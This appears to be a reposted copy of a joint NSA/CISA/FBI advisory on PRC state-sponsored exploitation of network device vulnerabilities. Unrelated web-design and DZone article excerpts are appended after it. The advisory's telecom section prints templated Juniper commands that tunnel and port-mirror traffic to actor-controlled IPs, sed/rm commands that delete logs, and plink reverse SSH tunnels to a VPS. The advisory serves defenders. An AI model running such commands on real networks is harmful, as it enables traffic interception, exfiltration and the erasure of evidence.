Original release date: June 7, 2022
Summary
Best Practices
• Apply patches as soon as possible
• Disable unnecessary ports and protocols
• Replace end-of-life infrastructure
• Implement a centralized patch management system
This joint Cybersecurity Advisory describes the ways in which People’s Republic of China (PRC) state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure. These actors use the network to exploit a wide variety of targets worldwide, including public and private sector organizations. The advisory details the targeting and compromise of major telecommunications companies and network service providers and the top vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—associated with network devices routinely exploited by the cyber actors since 2020.
This joint Cybersecurity Advisory was coauthored by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). It builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal, and territorial (SLTT) government; critical infrastructure (CI), including the Defense Industrial Base (DIB); and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).
Entities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing end-of-life infrastructure, and implementing a centralized patch management program.
NSA, CISA, and the FBI urge U.S. and allied governments, CI, and private industry organizations to apply the recommendations listed in the Mitigations section and Appendix A: Vulnerabilities to increase their defensive posture and reduce the risk of PRC state-sponsored malicious cyber actors affecting their critical networks.
For more information on PRC state-sponsored malicious cyber activity, see CISA’s China Cyber Threat Overview and Advisories webpage.
Click here for PDF.
Common vulnerabilities exploited by People’s Republic of China state-sponsored cyber actors
PRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Network devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as midpoints to conduct network intrusions on other entities. Over the last few years, a series of high-severity vulnerabilities for network devices provided cyber actors with the ability to regularly exploit and gain access to vulnerable infrastructure devices. In addition, these devices are often overlooked by cyber defenders, who struggle to maintain and keep pace with routine software patching of Internet-facing services and endpoint devices.
Since 2020, PRC state-sponsored cyber actors have conducted widespread campaigns to rapidly exploit publicly identified security vulnerabilities, also known as common vulnerabilities and exposures (CVEs). This technique has allowed the actors to gain access into victim accounts using publicly available exploit code against virtual private network (VPN) services [T1133] or public facing applications [T1190]—without using their own distinctive or identifying malware—so long as the actors acted before victim organizations updated their systems.
PRC state-sponsored cyber actors typically conduct their intrusions by accessing compromised servers called hop points from numerous China-based Internet Protocol (IP) addresses resolving to different Chinese Internet service providers (ISPs). The cyber actors typically obtain the use of servers by leasing remote access directly or indirectly from hosting providers. They use these servers to register and access operational email accounts, host C2 domains, and interact with victim networks. Cyber actors use these hop points as an obfuscation technique when interacting with victim networks.
These cyber actors are also consistently evolving and adapting tactics to bypass defenses. NSA, CISA, and the FBI have observed state-sponsored cyber actors monitoring network defenders’ accounts and actions, and then modifying their ongoing campaign as needed to remain undetected. Cyber actors have modified their infrastructure and toolsets immediately following the release of information related to their ongoing campaigns. PRC state-sponsored cyber actors often mix their customized toolset with publicly available tools, especially by leveraging tools that are native to the network environment, to obscure their activity by blending into the noise or normal activity of a network.
NSA, CISA, and the FBI consider the common vulnerabilities and exposures (CVEs) listed in Table 1 to be the network device CVEs most frequently exploited by PRC state-sponsored cyber actors since 2020.
Table 1: Top network device CVEs exploited by PRC state-sponsored cyber actors
Vendor CVE Vulnerability Type |
Cisco |
CVE-2018-0171 |
Remote Code Execution |
CVE-2019-15271 |
RCE |
CVE-2019-1652 |
RCE |
Citrix |
CVE-2019-19781 |
RCE |
DrayTek |
CVE-2020-8515 |
RCE |
D-Link |
CVE-2019-16920 |
RCE |
Fortinet |
CVE-2018-13382 |
Authentication Bypass |
MikroTik |
CVE-2018-14847 |
Authentication Bypass |
Netgear |
CVE-2017-6862 |
RCE |
Pulse |
CVE-2019-11510 |
Authentication Bypass |
CVE-2021-22893 |
RCE |
QNAP |
CVE-2019-7192 |
Privilege Elevation |
CVE-2019-7193 |
Remote Inject |
CVE-2019-7194 |
XML Routing Detour Attack |
CVE-2019-7195 |
XML Routing Detour Attack |
Zyxel |
CVE-2020-29583 |
Authentication Bypass |
Telecommunications and network service provider targeting
PRC state-sponsored cyber actors frequently utilize open-source tools for reconnaissance and vulnerability scanning. The actors have utilized open-source router specific software frameworks, RouterSploit and RouterScan [T1595.002], to identify makes, models, and known vulnerabilities for further investigation and exploitation. The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. RouterScan is an open-source tool that easily allows for the scanning of IP addresses for vulnerabilities. These tools enable exploitation of SOHO and other routers manufactured by major industry providers, including Cisco, Fortinet, and MikroTik.
Upon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored cyber actors have identified critical users and infrastructure including systems critical to maintaining the security of authentication, authorization, and accounting. After identifying a critical Remote Authentication Dial-In User Service (RADIUS) server, the cyber actors gained credentials to access the underlying Structured Query Language (SQL) database [T1078] and utilized SQL commands to dump the credentials [T1555], which contained both cleartext and hashed passwords for user and administrative accounts.
Having gained credentials from the RADIUS server, PRC state-sponsored cyber actors used those credentials with custom automated scripts to authenticate to a router via Secure Shell (SSH), execute router commands, and save the output [T1119]. These scripts targeted Cisco and Juniper routers and saved the output of the executed commands, including the current configuration of each router. After successfully capturing the command output, these configurations were exfiltrated off network to the actor’s infrastructure [TA0010]. The cyber actors likely used additional scripting to further automate the exploitation of medium to large victim networks, where routers and switches are numerous, to gather massive numbers of router configurations that would be necessary to successfully manipulate traffic within the network.
Armed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber actors returned to the network and used their access and knowledge to successfully authenticate and execute router commands to surreptitiously route [T1599], capture [T1020.001], and exfiltrate traffic out of the network to actor-controlled infrastructure.
While other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper router to perform initial tunnel configuration for eventual exfiltration out of the network:
set chassis fpc <slot number> pic <user defined value> tunnel-services bandwidth <user defined value>
set chassis network-services all-ethernet
set interfaces <interface-id> unit <unit number> tunnel source <local network IP address>
set interfaces <interface-id> unit <unit number> tunnel destination <actor controlled IP address>
After establishing the tunnel, the cyber actors configured the local interface on the device and updated the routing table to route traffic to actor-controlled infrastructure.
set interfaces <interface-id> unit <unit number> family inet address <local network IP address subnet>
set routing-options static route <local network IP address> next-hop <actor controlled IP address>
PRC state-sponsored cyber actors then configured port mirroring to copy all traffic to the local interface, which was subsequently forwarded through the tunnel out of the network to actor-controlled infrastructure.
set firewall family inet filter <filter name> term <filter variable> then port-mirror
set forwarding-options port-mirroring input rate 1
set forwarding-options port-mirroring family inet output interface <interface-id> next-hop <local network IP address>
set forwarding-options port-mirroring family inet output no-filter-check
set interfaces <interface-id> unit <unit number> family inet filter input <filter name>
set interfaces <interface-id> unit <unit number> family inet filter output <filter name>
Having completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy evidence of their activity to further obfuscate their presence and evade detection.
sed -i -e ‘/<REGEX>/d’ <log filepath 1>
sed -i -e ‘/<REGEX>/d’ <log filepath 2>
sed -i -e ‘/<REGEX>/d’ <log filepath 3>
rm -f <log filepath 4>
rm -f <log filepath 5>
rm -f <log filepath 6>
PRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH tunnels [T1572] between internal hosts and leased virtual private server (VPS) infrastructure. These actors often conducted system network configuration discovery [T1016.001] on these host networks by sending hypertext transfer protocol (HTTP) requests to C2 infrastructure in order to illuminate the external public IP address.
plink.exe –N –R <local port>:<host 1>:<remote port> -pw <user defined password> -batch root@<VPS1> -P <remote SSH port>
plink.exe –N –R <local port>:<host 2>:<remote port> -pw <user defined password> -batch root@<VPS2> -P <remote SSH port>
Mitigations
NSA, CISA, and the FBI urge organizations to apply the following recommendations as well as the mitigation and detection recommendations in Appendix A, which are tailored to observed tactics and techniques. While some vulnerabilities have specific additional mitigations below, the following mitigations generally apply:
- Keep systems and products updated and patched as soon as possible after patches are released [D3-SU] . Consider leveraging a centralized patch management system to automate and expedite the process.
- Immediately remove or isolate suspected compromised devices from the network [D3-ITF] [D3-OTF].
- Segment networks to limit or block lateral movement [D3-NI].
- Disable unused or unnecessary network services, ports, protocols, and devices [D3-ACH] [D3-ITF] [D3-OTF].
- Enforce multifactor authentication (MFA) for all users, without exception [D3-MFA].
- Enforce MFA on all VPN connections [D3-MFA]. If MFA is unavailable, enforce password complexity requirements [D3-SPP].
- Implement strict password requirements, enforcing password complexity, changing passwords at a defined frequency, and performing regular account reviews to ensure compliance [D3-SPP].
- Perform regular data backup procedures and maintain up-to-date incident response and recovery procedures.
- Disable external management capabilities and set up an out-of-band management network [D3-NI].
- Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce the exposure of the internal network [D3-NI].
- Enable robust logging of Internet-facing services and monitor the logs for signs of compromise [D3-NTA] [D3-PM].
- Ensure that you have dedicated management systems [D3-PH] and accounts for system administrators. Protect these accounts with strict network policies [D3-UAP].
- Enable robust logging and review of network infrastructure accesses, configuration changes, and critical infrastructure services performing authentication, authorization, and accounting functions [D3-PM].
- Upon responding to a confirmed incident within any portion of a network, response teams should scrutinize network infrastructure accesses, evaluate potential lateral movement to network infrastructure and implement corrective actions commensurate with their findings.
Resources
Refer to us-cert.cisa.gov/china, https://www.ic3.gov/Home/IndustryAlerts, and https://www.nsa.gov/cybersecurity-guidance for previous reporting on People’s Republic of China state-sponsored malicious cyber activity.
U.S. government and critical infrastructure organizations, should consider signing up for CISA’s cyber hygiene services, including vulnerability scanning, to help reduce exposure to threats.
U.S. Defense Industrial Base (DIB) organizations, should consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability scanning, and threat intelligence collaboration. For more information on eligibility criteria and how to enroll in these services, email dib_defense@cyber.nsa.gov.
Additional References
- CISA (2022), Weak Security Controls and Practices Routinely Exploited for Initial Access. https://www.cisa.gov/uscert/ncas/alerts/aa22-137a
- CISA (2022) 2021 Top Routinely Exploited Vulnerabilities. https://www.cisa.gov/uscert/ncas/alerts/aa22-117a
- NSA (2021), Selecting and Hardening Remote Access VPN Solutions. https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF
- NSA (2021), Chinese State-Sponsored Cyber Operations: Observed TTPs. https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/0/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF
- CISA (2021), Exploitation of Pulse Connect Secure Vulnerabilities. https://www.cisa.gov/uscert/ncas/alerts/aa21-110a
- NSA (2020), Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities. https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF
- CISA (2020), Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. https://www.cisa.gov/uscert/ncas/alerts/aa20-258a
- NSA (2020), Performing Out-of-Band Network Management. https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF
- CISA (2020), Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP. https://www.cisa.gov/uscert/ncas/alerts/aa20-020a
- NSA (2019), Mitigating Recent VPN Vulnerabilities. https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf
- NSA (2019), Update and Upgrade Software Immediately. https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update%20and%20Upgrade%20Software%20Immediately.docx%20-%20Copy.pdf
Contact Information
To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov. To report computer intrusion or cybercrime activity related to information found in this advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch at 855-292-3937 or by email at CyWatch@fbi.gov. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.
Media Inquiries / Press Desk:
Disclaimer of endorsement
The information and opinions contained in this document are provided « as is » and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.
Purpose
This advisory was developed by NSA, CISA, and the FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
Appendix A: Vulnerabilities
Table 2: Information on Cisco CVE-2018-0171
Table 3: Information on Cisco CVE-2019-15271
Cisco CVE-2019-15271 CVSS 3.0: 8.8 (High) |
Vulnerability Description
A vulnerability in the web-based management interface of certain Cisco Small Business RV Series Routers could allow an authenticated, remote attacker to execute arbitrary commands with root privileges. The attacker must have either a valid credential or an active session token. The vulnerability is due to lack of input validation of the HTTP payload. An attacker could exploit this vulnerability by sending a malicious HTTP request to the web-based management interface of the targeted device. A successful exploit could allow the attacker to execute commands with root privileges.
|
Recommended Mitigations
- Cisco has released free software updates that address the vulnerability described in this advisory.
- Cisco fixed this vulnerability in firmware releases 4.2.3.10 and later for the Cisco RV042 Dual WAN VPN Router and RV042G Dual Gigabit WAN VPN Router.
- Administrators can reduce the attack surface by disabling the Remote Management feature if there is no operational requirement to use it. Note that the feature is disabled by default.
|
Detection Methods
|
Vulnerable Technologies and Versions
This vulnerability affects the following Cisco Small Business RV Series Routers if they are running a firmware release earlier than 4.2.3.10:
- RV016 Multi-WAN VPN Router
- RV042 Dual WAN VPN Router
- RV042G Dual Gigabit WAN VPN Router
- RV082 Dual WAN VPN Router
|
References
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-sbrv-cmd-x
|
Table 4: Information on Cisco CVE-2019-1652
Table 5: Information on Citrix CVE-2019-19781
Citrix CVE-2019-19781 CVSS 3.0: 9.8 (Critical) |
Vulnerability Description
An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
|
Recommended Mitigations
- Implement the appropriate refresh according to the vulnerability details outlined by vendor: Citrix: Mitigation Steps for CVE-2019-19781.
- If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list).
|
Detection Methods
- CISA has developed a free detection tool for this vulnerability: cisa.gov/check-cve-2019-19781: Test a host for susceptibility to CVE-2019-19781.
- Nmap developed a script that can be used with the port scanning engine: CVE-2019-19781 – Critix ADC Path Traversal #1893.
- Citrix also developed a free tool for detecting compromises of Citrix ADC Appliances related to CVE-2019-19781: Citrix / CVE-2019-19781: IOC Scanner for CVE-2019-19781.
- CVE-2019-19781 is commonly exploited to install web shell malware. The National Security Agency (NSA) provides guidance on detecting and preventing web shell malware at https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF and signatures at https://github.com/nsacyber/Mitigating-Web-Shells.
|
Vulnerable Technologies and Versions
The vulnerability affects the following Citrix product versions on all supported platforms:
- Citrix ADC and Citrix Gateway version 13.0 all supported builds before 13.0.47.24
- NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18
- NetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 12.0.63.13
- NetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 11.1.63.15
- NetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12
- Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b
|
References
https://support.citrix.com/article/CTX267027
|
Table 6: Information on DrayTek CVE-2020-8515
DrayTek CVE-2020-8515 CVSS 3.0: 9.8 (Critical) |
Vulnerability Description
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.
|
Recommended Mitigations
- Users of affected models should upgrade to 1.5.1 firmware or later as soon as possible, the updated firmware addresses this issue.
- Disable the remote access on your router if you don’t need it.
- Disable remote access (admin) and SSL VPN. The ACL does not apply to SSL VPN connections (Port 443) so you should also temporarily disable SSL VPN until you have updated the firmware.
- Always back up your config before doing an upgrade.
- After upgrading, check that the web interface now shows the new firmware version.
- Enable syslog logging for monitoring if there are abnormal events.
|
Detection Methods
- Check that no additional remote access profiles (VPN dial-in, teleworker or LAN to LAN) or admin users (for router admin) have been added.
- Check if any ACL (Access Control Lists) have been altered.
|
Vulnerable Technologies and Versions
- This vulnerability affects the Vigor3900/2960/300B before firmware version 1.5.1.
|
References
https://draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/ http://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html
|
Table 7: Information on D-Link CVE-2019-16920
D-Link CVE-2019-16920 CVSS 3.0: 9.8 (Critical) |
Vulnerability Description
Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a « PingTest » device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
|
Recommended Mitigations
- Recommendation is to replace affected devices with ones that are currently supported by the vendor. End-of-life devices should not be used.
|
Detection Methods
- HTTP packet inspection to look for arbitrary input to the “ping_test” command
|
Vulnerable Technologies and Versions
- DIR DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-82
|
References
https://www.kb.cert.org/vuls/id/766427 https://fortiguard.com/zeroday/FG-VD-19-117 https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3 https://www.seebug.org/vuldb/ssvid-98079
|
Table 8: Information on Fortinet CVE-2018-13382
Fortinet CVE-2018-13382 CVSS 3.0: 7.5 (High) |
Vulnerability Description
An Improper Authorization vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to modify the password of an SSL VPN web portal user via specially crafted HTTP requests.
|
Recommended Mitigations
- Upgrade to FortiOS versions 5.4.11, 5.6.9, 6.0.5, 6.2.0 or above and/or upgrade to FortiProxy version 1.2.9 or above or version 2.0.1 or above.
- SSL VPN users with local authentication can mitigate the impact by enabling Two-Factor Authentication (2FA).
- Migrate SSL VPN user authentication from local to remote (LDAP or RADIUS).
- Totally disable the SSL-VPN service (both web-mode and tunnel-mode) by applying the following CLI commands: config vpn ssl settings, unset source-interface, end.
|
Detection Methods
- HTTP packet inspection to look for specially crafted packets containing the magic key for the SSL VPN password modification
|
Vulnerable Technologies and Versions
This vulnerability affects the following products:
- Fortinet FortiOS 6.0.0 to 6.0.4
- Fortinet FortiOS 5.6.0 to 5.6.8
- Fortinet FortiOS 5.4.1 to 5.4.10
- Fortinet FortiProxy 2.0.0
- Fortinet FortiProxy 1.2.8 and below
- Fortinet FortiProxy 1.1.6 and below
- Fortinet FortiProxy 1.0.7 and below
FortiOS products are vulnerable only if the SSL VPN service (web-mode or tunnel-mode) is enabled and users with local authentication.
|
References
https://fortiguard.com/psirt/FG-IR-18-389 https://fortiguard.com/advisory/FG-IR-18-389 https://www.fortiguard.com/psirt/FG-IR-20-231
|
Table 9: Information on Mikrotik CVE-2018-14847
Mikrotik CVE-2018-14847 CVSS 3.0: 9.1 (Critical) |
Vulnerability Description
MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.
|
Recommended Mitigations
- Upgrade WinBox and RouterOS and change passwords
- Firewall the WinBox port from the public interface and from untrusted networks
|
Detection Methods
- Use export command to see all your configuration and inspect for any abnormalities, such as unknown SOCKS proxy settings and scripts.
|
Vulnerable Technologies and Versions
This vulnerability affected the following MikroTik products:
- All bugfix releases from 6.30.1 to 6.40.7
- All current releases from 6.29 to 6.42
- All RC releases from 6.29rc1 to 6.43rc3
|
References
https://blog.mikrotik.com/security/winbox-vulnerability.html
|
Table 10: Information on Netgear CVE-2017-6862
Table 11: Information on Pulse CVE-2019-11510
Pulse CVE-2019-11510 CVSS 3.0: 10 (Critical) |
Vulnerability Description
In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability.
|
Recommended Mitigations
- Upgrade to the latest Pulse Secure VPN.
- Stay alert to any scheduled tasks or unknown files/executables.
- Create detection/protection mechanisms that respond on directory traversal (/../../../) attempts to read local system files.
|
Detection Methods
- CISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510: cisa.gov/check-your-pulse.
- Nmap developed a script that can be used with the port scanning engine: http-vuln-cve2019- 11510.nse #1708.
|
Vulnerable Technologies and Versions
This vulnerability affects the following Pulse Connect Secure products:
- 9.0R1 to 9.0R3.3
- 8.3R1 to 8.3R7
- 8.2R1 to 8.2R12
|
References
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/
|
Table 12: Information on Pulse CVE-2021-22893
Table 13: Information on QNAP CVE-2019-7192
QNAP CVE-2019-7192 CVSS 3.0: 9.8 (Critical) |
Vulnerability Description
This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.
|
Recommended Mitigations
Update Photo Station to versions:
- QTS 4.4.1 Photo Station 6.0.3 and later
- QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
- QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
- QTS 4.2.6 Photo Station 5.2.11 and later
|
Detection Methods
|
Vulnerable Technologies and Versions
This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.
|
References
https://www.qnap.com/zh-tw/security-advisory/nas-201911-25 http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
|
Table 14: Information on QNAP CVE- 2019-7193
Table 15: Information on QNAP CVE-2019-7194
QNAP CVE-2019-7194 CVSS 3.0: 9.8 (Critical) |
Vulnerability Description
This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommend updating Photo Station to their latest versions.
|
Recommended Mitigations
Update Photo Station to versions:
- QTS 4.4.1 Photo Station 6.0.3 and later
- QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
- QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
- QTS 4.2.6 Photo Station 5.2.11 and later
|
Detection Methods
|
Vulnerable Technologies and Versions
This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.
|
References
https://www.qnap.com/zh-tw/security-advisory/nas-201911-25 http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
|
Table 16: Information on QNAP CVE-2019-7195
QNAP CVE-2019-7195 CVSS 3.0: 9.8 (Critical) |
Vulnerability Description
This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommend updating Photo Station to their latest versions.
|
Recommended Mitigations
Update Photo Station to versions:
- QTS 4.4.1 Photo Station 6.0.3 and later
- QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
- QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
- QTS 4.2.6 Photo Station 5.2.11 and later
|
Detection Methods
|
Vulnerable Technologies and Versions
This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.
|
References
https://www.qnap.com/zh-tw/security-advisory/nas-201911-25 http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
|
Table 17: Information on Zyxel CVE-2020-29583
Revisions
- Initial Version: June 7, 2022
This product is provided subject to this Notification and this Privacy & Use policy.
Source de l’article sur us-cert.gov
10 Dos and Don’Ts of Web Design in 2022
Actualités, ActualitésNavigating the world of web design can be difficult. There is so much conflicting and outdated advice.
How many times have you been advised to obey the 3-Click Rule? It states that users must reach the content they want in three clicks. But, according to the Nielsen Norman Group, no research supports the 3-Click Rule. It’s just a guess, the web’s equivalent of an urban myth.
There are dos and don’ts of effective web design in 2022. In this post, we’ll present the most important so that you can design websites with confidence.
Do: Make Use of Design Patterns
Design Patterns sound like a complex technique. All it means is copying standard, well-known approaches. Jakob’s Law says that most people spend most of their time on other sites, so they will understand your site better if it is like those other sites.
You can’t make your site like every other, so your job is to pick and choose which design patterns will be most helpful to your target demographic.
Some of the most recognized design patterns include placing the logo in the top left of the viewport, underlining links, and placing essentials like shipping information in the footer.
Do: Make It Inclusive
Inclusive design holds the opinion that the web is for everybody. It hasn’t always been that way. Just a few years ago, it was common to see sites excluding some demographics to reduce development costs.
Excluding anyone from your website is wrong. In many jurisdictions, it’s so wrong it’s illegal. But, perhaps more importantly, excluding 5% of users deducts 5% from your profits.
It’s never been easier to be inclusive. The first step is to make your website responsive so that it caters to every device. Then, follow accessibility guidelines to ensure that you welcome everyone. Finally, be ready to listen to your users, and adapt to their needs.
Do: Keep It Simple
As a website designer, you’ve undoubtedly looked in envy at some of the more original sites out there. It’s important to remember that many of the most experimental sites are usually targeting other designers. Something that works well on a portfolio site won’t translate well to a local convenience store.
99 times out of 100, the simple choice is the right choice. Most people aren’t interested in an original design. They’re interested in accomplishing a task. The less effort expended to complete the task, the better the experience.
Complexity most often creeps into navigation. Start with a logical structure, and use simple, hierarchical navigation.
Do: Stay Focussed
Every website has goals. It might be promotion, profit, utility, or a combination. Each part of that website, every single page, should have one goal.
Hick’s Law says that the time it takes to make a decision increases when there are more choices. And the Goal-Gradient Effect says that a customer is more likely to complete a process the closer they are to the completion. Combine the two, and it means that giving users one CTA (call to action) on a page increases the chances of them taking it.
It’s OK to still have navigation, links, and secondary goals provided each page has a single clear purpose.
Do: Keep Your UI Consistent
Consistency is often referred to as the hallmark of quality. It means that you’ve paid attention to details. But consistency isn’t just about giving a good impression. Consistency is also essential for good UX (user experience).
Users learn to navigate your website as they go. They learn your website’s ‘rules’ or the logic as they interact with it. If your UI (user interface) is consistent, they’ll learn the rules faster and feel more confident.
Areas that often fail the consistency test are the corner radius of boxes, the style of links, and the tone of writing.
Don’t: Ignore Aesthetics
Design isn’t all about usability studies and reliance on design patterns. Design should also be beautiful.
Beauty is often seen as shallow and unimportant. However, the Aesthetic-Usability Effect states that a beautiful website is more likely to be seen as usable by customers.
A pretty design is a high-converting design.
To ensure your design is pretty, pay attention to your typography hierarchy, color scheme, and the symmetry of your layout.
Don’t: Make Users Wait
The worst thing you can do is make users wait. The more technology advances, the faster connections get the higher user expectations.
Your site needs to load in under a second and be interactive in under two seconds. Otherwise, you’ll lose customers who bounce back to their search engine and try one of your competitors instead.
Delays don’t only apply to the speed of your site. You need to ensure that the information or product a customer wants is easy to access. Don’t bury it multiple levels deep in your site. If users are delayed by complicated navigation or unpredictable structure, they will exit your site as surely as if it took 10 seconds to load.
Users have zero amounts of patience.
Don’t: Block the Screen
Browsing through the web, the number of designers that block users from seeing the content on a website is astounding.
The most common culprits are newsletter subscription offers. How can a customer know whether they want to sign up for your newsletter when they haven’t yet seen your products?! Let the user browse your site, and then offer them a newsletter subscription.
Another common culprit is cookie notices. Most sites require a modest cookie notice to stay on the right side of the Law. And yet they display a huge, site-blocking modal as if the cookie notice were the most critical content on the site.
Don’t: Leave Content Until Last
Content is frequently left until last. That’s because it’s hard. Just because we learned to read and write as kids doesn’t mean we can write persuasive, engaging sales copy.
Content is vitally important for SEO (search engine optimization), but more importantly, it’s essential for CX (customer experience).
Most websites make three big mistakes with their content.
Mistake one is unbalanced copy. That means writing 25 words about your flagship product and 5,000 words about the company’s history.
Mistake two is writing for the company, not for the customer. That means organizing content around the company structure rather than customer tasks.
Mistake three is too much content at once. Walls of text are a turn-off. Instead, write short, scannable snippets that will keep customers engaged.
“Don’t try to be original…
…Just try to be good.”
That quote is from the titan of twentieth-century design, Paul Rand.
It boils down to this: originality is about you, and quality is about the website. Great designers care more about their output than their reputation.
Featured image via Pexels.
Source
The post 10 Dos and Don’Ts of Web Design in 2022 first appeared on Webdesigner Depot.
Source de l’article sur Webdesignerdepot
Data Lineage Is Broken — Here Are 5 Ways to Fix It
Actualités, Méthodes et organisation des process ITData lineage isn’t new, but automation has finally made it accessible and scalable—to a certain extent.
In the old days (way back in the mid-2010s), lineage happened through a lot of manual work. This involved identifying data assets, tracking them to their ingestion sources, documenting those sources, mapping the path of data as it moved through various pipelines and stages of transformation, and pinpointing where the data was served up in dashboards and reports.
Source de l’article sur DZONE
Getting Started With Service Calls and Serverless Workflow
Actualités, Méthodes et organisation des process ITWorkflows are great for orchestrating services, functions, or events. They provide out-of-the-box features to make your applications resilient, reliable, and simple.
